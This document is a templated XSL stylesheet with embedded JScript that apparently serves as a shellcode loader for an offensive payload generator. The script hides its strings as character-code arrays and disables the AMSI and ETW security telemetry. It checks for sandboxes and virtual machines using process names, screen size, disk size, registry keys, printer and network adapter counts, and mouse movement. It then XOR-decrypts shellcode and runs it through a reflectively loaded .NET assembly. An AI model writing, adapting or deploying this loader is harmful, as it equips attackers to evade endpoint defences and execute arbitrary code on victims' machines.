<?xml version="1.0"?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" version="1.0"
            xmlns:ms="urn:schemas-microsoft-com:xslt"
            xmlns:user="placeholder">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
function {{ v.fn_build_str }}(a){var s="";for(var i=0;i<a.length;i++)s+=String.fromCharCode(a[i]);return s;}

function {{ v.fn_amsi }}() {
    try {
        var asm  = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}]));
        var amsi = asm.GetType({{ v.fn_build_str }}([{{ v.jsc_auto_amsi_utils }}]));
        if (amsi !== null)
            amsi.GetField({{ v.fn_build_str }}([{{ v.jsc_amsi_init_fail }}]), 36).SetValue(null, true);
    } catch(e) {}
}

function {{ v.fn_etw }}() {
    try {
        var asm = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}]));
        var t   = asm.GetType({{ v.fn_build_str }}([{{ v.jsc_eventing_ep }}]));
        if (t !== null) {
            var fi = t.GetField({{ v.fn_build_str }}([{{ v.jsc_m_enabled }}]), 36);
            if (fi !== null) fi.SetValue(null, 0);
        }
    } catch(e) {}
}

function {{ v.fn_sandbox }}() {
    try {
        var wmi = GetObject({{ v.fn_build_str }}([{{ v.jsc_winmgmts }}]));
        var bad = {{ v.fn_build_str }}([{{ v.jsc_vm_procs }}]).split("|");
        var pq  = wmi.ExecQuery({{ v.fn_build_str }}([{{ v.jsc_wmi_proc_q }}]));
        for (var e = new Enumerator(pq); !e.atEnd(); e.moveNext()) {
            var n = e.item().Name.toLowerCase();
            for (var i = 0; i < bad.length; i++) { if (n === bad[i]) return true; }
        }
        var mq = wmi.ExecQuery({{ v.fn_build_str }}([{{ v.jsc_wmi_monitor_w }}]));
        for (var e2 = new Enumerator(mq); !e2.atEnd(); e2.moveNext()) {
            if (e2.item().ScreenWidth && e2.item().ScreenWidth < 800) return true;
        }
    } catch(e) {}
    try {
        var fso = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_fs_obj }}]));
        var drv = fso.GetDrive("C:");
        if (drv.TotalSize < 53687091200) return true;
    } catch(e) {}
    try {
        var sh = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_wscript_shell }}]));
        sh.RegRead({{ v.fn_build_str }}([72,75,76,77,92,83,79,70,84,87,65,82,69,92,86,77,119,97,114,101,44,32,73,110,99,46,92,86,77,119,97,114,101,32,84,111,111,108,115,92,73,110,115,116,97,108,108,80,97,116,104]));
        return true;
    } catch(e) {}
    try {
        var sh2 = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_wscript_shell }}]));
        sh2.RegRead({{ v.fn_build_str }}([72,75,76,77,92,83,79,70,84,87,65,82,69,92,79,114,97,99,108,101,92,86,105,114,116,117,97,108,66,111,120,32,71,117,101,115,116,32,65,100,100,105,116,105,111,110,115,92,86,101,114,115,105,111,110]));
        return true;
    } catch(e) {}
    try {
        var wmi2 = GetObject({{ v.fn_build_str }}([{{ v.jsc_winmgmts }}]));
        var prq = wmi2.ExecQuery({{ v.fn_build_str }}([{{ v.jsc_wmi_printer_q }}]));
        var pc = 0;
        for (var ep = new Enumerator(prq); !ep.atEnd(); ep.moveNext()) pc++;
        if (pc === 0) return true;
    } catch(e) {}
    try {
        var wmi3 = GetObject({{ v.fn_build_str }}([{{ v.jsc_winmgmts }}]));
        var naq = wmi3.ExecQuery({{ v.fn_build_str }}([{{ v.jsc_wmi_mac_q }}]));
        var nac = 0;
        for (var ena = new Enumerator(naq); !ena.atEnd(); ena.moveNext()) nac++;
        if (nac < 2) return true;
    } catch(e) {}
    try {
        var _env = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_wscript_shell }}])).Environment("Process");
        if (_env({{ v.fn_build_str }}([{{ v.jsc_env_vbox }}])) !== "") return true;
        if (_env({{ v.fn_build_str }}([{{ v.jsc_env_sandboxie }}])) !== "") return true;
    } catch(e) {}
    return false;
}

function {{ v.fn_hex2arr }}(h){var a=[];for(var i=0;i<h.length;i+=2)a.push(parseInt(h.substr(i,2),16));return a;}
function {{ v.fn_xor }}(d,k){var o=[];for(var i=0;i<d.length;i++)o.push(d[i]^k[i%k.length]);return o;}

if (!{{ v.fn_sandbox }}()) {
    var _cx = -999, _cy = -999;
    try {
        var _a=new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}])),_w=_a.LoadWithPartialName({{ v.fn_build_str }}([{{ v.jsc_sys_win_forms }}]));
        if(_w){var _t=_w.GetType({{ v.fn_build_str }}([{{ v.jsc_sys_win_forms_cur }}]));
        if(_t){var _pp=_t.GetProperty({{ v.fn_build_str }}([{{ v.jsc_cursor_position }}]),24);
        if(_pp){var _ps=_pp.GetValue(null,null);if(_ps){_cx=_ps.GetType().GetProperty({{ v.fn_build_str }}([88])).GetValue(_ps,null);_cy=_ps.GetType().GetProperty({{ v.fn_build_str }}([89])).GetValue(_ps,null);}}}}
    } catch(_e) {}
    try { WScript.Sleep(2000 + Math.floor(Math.random() * 3000)); } catch(_es) {
        var _ts = new Date().getTime(); while(new Date().getTime() - _ts < 2000) {}
    }
    if (_cx !== -999) {
        try {
            var _a2=new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}])),_w2=_a2.LoadWithPartialName({{ v.fn_build_str }}([{{ v.jsc_sys_win_forms }}]));
            if(_w2){var _t2=_w2.GetType({{ v.fn_build_str }}([{{ v.jsc_sys_win_forms_cur }}]));
            if(_t2){var _pp2=_t2.GetProperty({{ v.fn_build_str }}([{{ v.jsc_cursor_position }}]),24);
            if(_pp2){var _ps2=_pp2.GetValue(null,null);if(_ps2){var _cx2=_ps2.GetType().GetProperty({{ v.fn_build_str }}([88])).GetValue(_ps2,null);var _cy2=_ps2.GetType().GetProperty({{ v.fn_build_str }}([89])).GetValue(_ps2,null);if(_cx===_cx2&&_cy===_cy2)return;}}}}
        } catch(_e2) {}
    }
    {{ v.fn_amsi }}();
    {{ v.fn_etw }}();
    var _k = {{ v.fn_hex2arr }}({% for chunk in key_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %});
    for (var _ki = 0; _ki < _k.length; _ki++) _k[_ki] ^= {{ key_tweak }};
    var sc = {{ v.fn_xor }}({{ v.fn_hex2arr }}({% for chunk in shellcode_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %}), _k);
    var loader = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}]));
    var asm = loader.Load({{ v.fn_hex2arr }}("{{ v.dotnet_stub_hex }}"));
    asm.GetType({{ v.fn_build_str }}([{{ v.jsc_stub_loader }}])).GetMethod({{ v.fn_build_str }}([{{ v.jsc_stub_run }}])).Invoke(null, [sc]);
}
]]>
</ms:script>
</stylesheet>
